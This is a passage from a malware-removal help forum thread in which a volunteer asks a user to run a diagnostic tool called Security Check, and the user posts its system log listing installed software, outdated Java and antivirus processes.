C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****
 



#14 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 27 October 2016 - 06:16 PM

Thanks, just one more thing...

 

34hammr.jpg Download Security Check from here or here and save it to your Desktop.

  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • please copy and paste the log into your reply.


#15 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 27 October 2016 - 09:59 PM

 Results of screen317's Security Check version 1.014 --- 12/23/15  
 Windows 7 Service Pack 1 x64 (UAC is disabled!)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!  
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 JavaFX 2.1.1    
 Java 8 Update 91  
 Java version 32-bit out of Date!
 Adobe Flash Player 21.0.0.242  
 Adobe Reader XI  
 Mozilla Firefox (49.0.2)
 Google Chrome (53.0.2785.143)
 Google Chrome (54.0.2840.71)
 Google Chrome (SetupMetrics...)
````````Process Check: objlist.exe by Laurent````````  
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Kevin Desktop virusfix SecurityCheck.exe
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 0%
````````````````````End of Log``````````````````````
 






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users